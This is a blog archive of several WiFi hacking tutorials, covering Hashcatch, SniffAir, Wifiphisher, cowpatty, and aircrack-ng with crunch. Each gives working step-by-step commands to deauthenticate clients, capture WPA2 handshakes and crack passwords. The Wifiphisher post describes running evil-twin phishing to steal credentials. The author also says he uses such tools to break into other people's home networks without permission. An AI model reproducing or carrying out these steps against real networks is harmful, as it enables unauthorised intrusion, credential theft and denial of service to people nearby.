Showing posts with label wifi hacking. Show all posts
Showing posts with label wifi hacking. Show all posts

Friday, August 30, 2019

Hashcatch V1.0 automated WiFi hacker

Welcome to hackingarise I’m the laughing man and this a tutorial is on Hashcatch a bash tool to automate wifi hacking dosnt that sound sexy my people ahaha i bet all u script kiddies are coming in your pants right about now lol only joking or am i hahaha so i found this tool just looking true github you know when you are bored out your skull and noting else to do on like best part you im not a black hat

😜

this script can run on linux or nethunter not sure about termux but worth a try as it works in my termux but if nethunter running in termux as well as iv it flashed to my s6 anyways lets move on .

What is Hashcatch

Hashcatch deauthenticates clients connected to all nearby WiFi networks and tries to capture the handshakes. It can be used in any linux device including Raspberry Pi and Nethunter devices so that you can capture handshakes while walking your dog.
Find out more here

SivaneshAshok git hub here

How to install Hashcatch

open a terminal and type

    git clone https://github.com/staz0t/hashcatch.git
    cd hashcatch
    ls
    chmod +x hashcatch

Hacking A Rise install-hashcatch

now we need to install hcxtools so frist we need to clone the script so type

    git clone https://github.com/ZerBea/hcxtools.git
    cd hcxtools
    make

Hacking A Rise hcxtools

How to use Hashcatch

now we type
./hashcatch
this will gave us a error and tell use to type hashcatch --setup
Hacking A Rise startuphashcatch

now we type ./hashcatch --setup
Hacking A Rise runnn
it will ask u for the wifi interface this is eader wlan0 or wlan1 use ifconfig to find your one

Hacking A Rise ifconfig

now to run the script we type ./hashcatch and let it run

Final thoughts

so lads this script is handy for lot of things me personally i be using when Im sitting out side pedos houses to braking in to there network. in all-fairness for people that dont understand how to hack WiFi this the script for you as well for hackers as this fast script for ya to use war-driving 😉

Saturday, August 17, 2019

SniffAir framework for wireless attacks

Wasap people laughing man here with another post this ones on sniff air made for sophisticated wireless attacks and data capture it is mead with python 2.7 bit out dated on the python but still great tool to use (note this tool is not for noobs as u can coz harm to your network to the point it cant be fixed so lets start

What is sniffair

SniffAir is an open-source wireless security framework which provides the ability to easily parse passively collected wireless data as well as launch sophisticated wireless attacks. SniffAir takes care of the hassle associated with managing large or multiple pcap files while thoroughly cross-examining and analyzing the traffic, looking for potential security flaws. Along with the prebuilt queries, SniffAir allows users to create custom queries for analyzing the wireless data stored in the backend SQL database. SniffAir is built on the concept of using these queries to extract data for wireless penetration test reports. The data can also be leveraged in setting up sophisticated wireless attacks included in SniffAir as modules.
SniffAir is developed by Tyl0us and theDarracott

how to install sniffair

type in terminal
git clone https://github.com/Tylous/SniffAir
cd SniffAir
chmod +x setup.sh
./setup.sh

Hacking A Rise setupsniffair-300x168

How to use sniffair

now we type python sniffair.py
Hacking A Rise sniffair-300x126

now we need to add a workspace so type workspace crate laughingman or what ever name u wanna use
Hacking A Rise workspacesniffair-300x55

now we load the workspace so type workspace load laughingman
Hacking A Rise loadworkspace-300x39

now type show modules
Hacking A Rise show-modules-300x83

now we type use Auto PSK
then info
Hacking A Rise showinfoandmodulea-300x148

Now we can start setting up the settings for a attack so type set varibles once set type run to let it run
[laughingman][Auto PSK]# set varibles ssid FRITZBox 7430 ZV
[laughingman][Auto PSK]# set varibles Password file /usr/share/ike-scan/psk-crack-dictionary
[laughingman][Auto PSK]# run

Hacking A Rise setvaribles--300x21

just let it run and with for the password

Right lads there we have it wireless hacking framework its a good tool but for noobs its not the best as its more advance than most the tools out there so best stick to the basic tools NOOBS till u learn more anyways laughingman out 🙂

Thursday, June 20, 2019

Wifiphisher

Welcome to hacking a rise in this one we are going to show you wifiphisher a python script that will help you gain WiFi passwords social media passwords stuff like that

what is wifiphisher

Wifiphisher is a rogue Access Point framework for conducting red team engagements or Wi-Fi security testing. Using Wifiphisher, penetration testers can easily achieve a man-in-the-middle position against wireless clients by performing targeted Wi-Fi association attacks. Wifiphisher can be further used to mount victim-customized web phishing attacks against the connected clients in order to capture credentials (e.g. from third party login pages or WPA/WPA2 Pre-Shared Keys) or infect the victim stations with malwares.

Wifiphisher is…

…powerful. Wifiphisher can run for hours inside a Raspberry Pi device executing all modern Wi-Fi association techniques (including “Evil Twin”, “KARMA” and “Known Beacons”).

…flexible. Supports dozens of arguments and comes with a set of community-driven phishing templates for different deployment scenarios.

…modular. Users can write simple or complicated modules in Python to expand the functionality of the tool or create custom phishing scenarios in order to conduct specific target-oriented attacks.

…easy to use. Advanced users can utilize the rich set of features that Wifiphisher offers but beginners may start out as simply as “./bin/wifiphisher”. The interactive Textual User Interface guides the tester through the build process of the attack.

…the result of an extensive research. Attacks like “Known Beacons” and “Lure10” as well as state-of-the-art phishing techniques, were disclosed by our developers, and Wifiphisher was the first tool to incorporate them.

…supported by an awesome community of developers and users.

…free. Wifiphisher is available for free download, and also comes with full source code that you may study, change, or distribute under the terms of the GPLv3 license.

how wifiphisher works

Wi-Fi phishing consists of two steps:

The first step involves the process of associating with Wi-Fi clients unknowingly, or in other words, obtaining a man-in-the-middle (MITM) position. Wifiphisher uses a number of different techniques to achieve this including:

Evil Twin, where Wifiphisher creates a fake wireless network that looks similar to a legitimate network.
KARMA, where Wifiphisher masquerades as a public network searched for by nearby Wi-Fi clients.
Known Beacons, where Wifiphisher broadcasts a dictionary of common ESSIDs, that the around wireless stations have likely connected to in the past.
At the same time, Wifiphisher keeps forging “Deauthenticate” or “Disassociate” packets to disrupt existing associations and eventually lure victims using the above techniques.

Performing MiTM attack

(Optionally) There are a number of different attacks that can be carried out once Wifiphisher grants the penetration tester with a man-in-the-middle position. For example, the tester may perform data sniffing or scan the victim stations for vulnerabilities.

Using Wifiphisher, advanced web phishing techniques are possible by gathering information from the target environment and victim user. For example, in one of our scenarios, Wifiphisher will extract information from the broadcasted beacon frames and the HTTP User-Agent header to display a web-based imitation of Windows network manager in order to capture the Pre-Shared Key.

FIND OUT MORE

How to install Wifiphisher


so there is two way to install this on kali type apt-get install wifiphisher -y
Hacking A Rise wifiphisher-install-300x256

or use git hub
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher # Switch to tool’s directory
sudo python setup.py install # Install any dependencies

How to use Wifiphisher

now its installed type wifiphisher -iI wlan1 it will gave you this screen just pick you target press enter
Hacking A Rise pick-300x185

now u picked your target we are going to be asked what method you want to use to gain password
Hacking A Rise 68747470733a2f2f77696669706869736865722e6769746875622e696f2f77696669706869736865722f7373352e706e67

now we with for the target to type there password the script will close as soon as the password is gained
Hacking A Rise targets-300x186

Tuesday, April 30, 2019

How to use cow-patty for wpa2-psk

welcome back to hacking a rise today we are going to talk about how to use cow patty this method is bruteforce slow and way to gain the password me personally i crack the wps or use a evil twin attack but look people want u know how to hack wifi u need to know all methods and tools not y best idea but look here we are hahahahahaha fuck it

WHAT IS COW PATTY

Implementation of an offline dictionary attack against WPA/WPA2 networks using PSK-based authentication (e.g. WPA-Personal). Many enterprise networks deploy PSK-based authentication mechanisms for WPA/WPA2 since it is much easier than establishing the necessary RADIUS, supplicant and certificate authority architecture needed for WPA-Enterprise authentication. Cowpatty can implement an accelerated attack if a precomputed PMK file is available for the SSID that is being assessed.

(tip: use a usb WiFi card )

HOW TO USE

right first we need put the card in to monitor mode so open a terminal and type

airmon-ng start wlan1

Hacking A Rise airmon

Now we start airodump-ng in the simple way this is to scan network signals in the air like hidden wifi signals so open terminal and type

airodump-ng wlan1mon

Hacking A Rise airodump

now we open a new terminal and run airodump-ng on the channel of the target since my target is HUAWEI-B525-FD28 we will be using channel 8 so type and close the other airodump terminal

airodump-ng -c 8 --write HUAWEI-B525-FD28 wlan1mon

Hacking A Rise airodump-ng2

now we have are target wifi so we need to get a handshake so we are going to kick someone of the wifi to force the to sign back in so open new terminal and type this

airplay-ng -o 100 -a E4:0E:EE:B1:FD:28 -c 00:13:E8:21:AF:81 wlan1mon

Hacking A Rise aireplay-ng

when u get the handshake it will pop out on the terminal with airodump-ng running

Hacking A Rise handshake
(Note
you cant crack the wifi with out the handshake )

so now we get to the point were we need to crack the .cap file for the password so now type

cowpatty -r HUAWEI-B525-FD28-03.cap -f wordlist.txt -s HUAWEI-B525-FD28

Hacking A Rise cowpatty

note

this one the slowest methods so dont be saying it dont work that im shit resson been the wordlist u provided did not have the password so there for why i can stress hack the wps to get the wpa2 password check here for the ——> <---------

Wednesday, April 10, 2019

AIRCRACK AND CRUNCH

welcome to hacking a rise in this we are using no password list as we are piping crunch with aircrack

What is crunch

Crunch is a wordlist generator where you can specify a standard character set or a character set you specify. crunch can generate all possible combinations and permutations. Some other options are: The Associative Word List Generator (AWLG) – Wordlists for Password Cracking

How to use

so lets get stuck in to this so open a terminal and type ifconfig
Hacking A Rise ifconfig

I recommend using a USB WiFi Card as most systems use wlan0 as the default so the USB is wlan1 so what we are doing we are going to put the card in to monitor mode this will let us see all the networks public and hidden like WiFi cams so now type airmon-ng start wlan1
Hacking A Rise airmon-ngstart

as u see in the pic my usb wifi card is now wlan1mon so now we are in monitor mode we can now start the airodump-ng so open the terminal and type airodump-ng wlan1mon
Hacking A Rise airodump1

are target is HUAWEI-B525-FD28 so what we wanna do is change the channel to 5 since my network is on channel 5 so we open a new terminal and type airodump-ng -c 5 --bssid E4:0E:EE:B1:FD:28 -w /root/desktop/ wlan1mon

now we wanna force the client of the target to sign in to the network agen so type this command aireplay-ng -0 100 -a E4:0E:EE:B1:FD:28 -c 00:13:E8:21:AF:81 wlan1mon

Hacking A Rise airplay

now we can use aircrack and crunch to brute the wifi this method is handy for devices with little or no memory
with till u get a four way handshake once u get it we can now crack the wifi with aircrack so type crunch 1 24| aircrack-ng -e HUAWEI-B525-FD28 -w – desktop-01.cap
Hacking A Rise aircrackcrunch

just let it finish but keep this in mind it is very very slow so anyways best luck and hack the plant 🙂

HOW TO HACK WPA2 WITH AIRCRACK-NG

Welcome to hacking a rise in this post we will be hacking WiFi with aircrack-ng keep this in mind this method is slow as fuck it depends on your device and wordlist so if u got a shit device it will take ages to crack.

What is aircrack-ng

Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs. It works with any wireless network interface controller whose driver supports raw monitoring mode and can sniff 802.11a, 802.11b and 802.11g traffic.

How to use

so lets get stuck in to this so open a terminal and type ifconfig
Hacking A Rise ifconfig

I recommend using a USB WiFi Card as most systems use wlan0 as the default so the USB is wlan1 so what we are doing we are going to put the card in to monitor mode this will let us see all the networks public and hidden like WiFi cams so now type airmon-ng start wlan1
Hacking A Rise airmon-ngstart

as u see in the pic my usb wifi card is now wlan1mon so now we are in monitor mode we can now start the airodump-ng so open the terminal and type airodump-ng wlan1mon
Hacking A Rise airodump1

are target is HUAWEI-B525-FD28 so what we wanna do is change the channel to 5 since my network is on channel 5 so we open a new terminal and type airodump-ng -c 5 --bssid E4:0E:EE:B1:FD:28 -w /root/desktop/ wlan1mon

now we wanna force the client of the target to sign in to the network agen so type this command aireplay-ng -0 100 -a E4:0E:EE:B1:FD:28 -c 00:13:E8:21:AF:81 wlan1mon

Hacking A Rise airplay

with till u get a four way handshake once u get it we can now crack the wifi with aircrack so type aircrack-ng -a2 -b E4:0E:EE:B1:FD:28 -w /root/Desktop//toolsandscripts/rockyou.txt desktop-01.cap
Hacking A Rise aircrack

there ya go that simple lads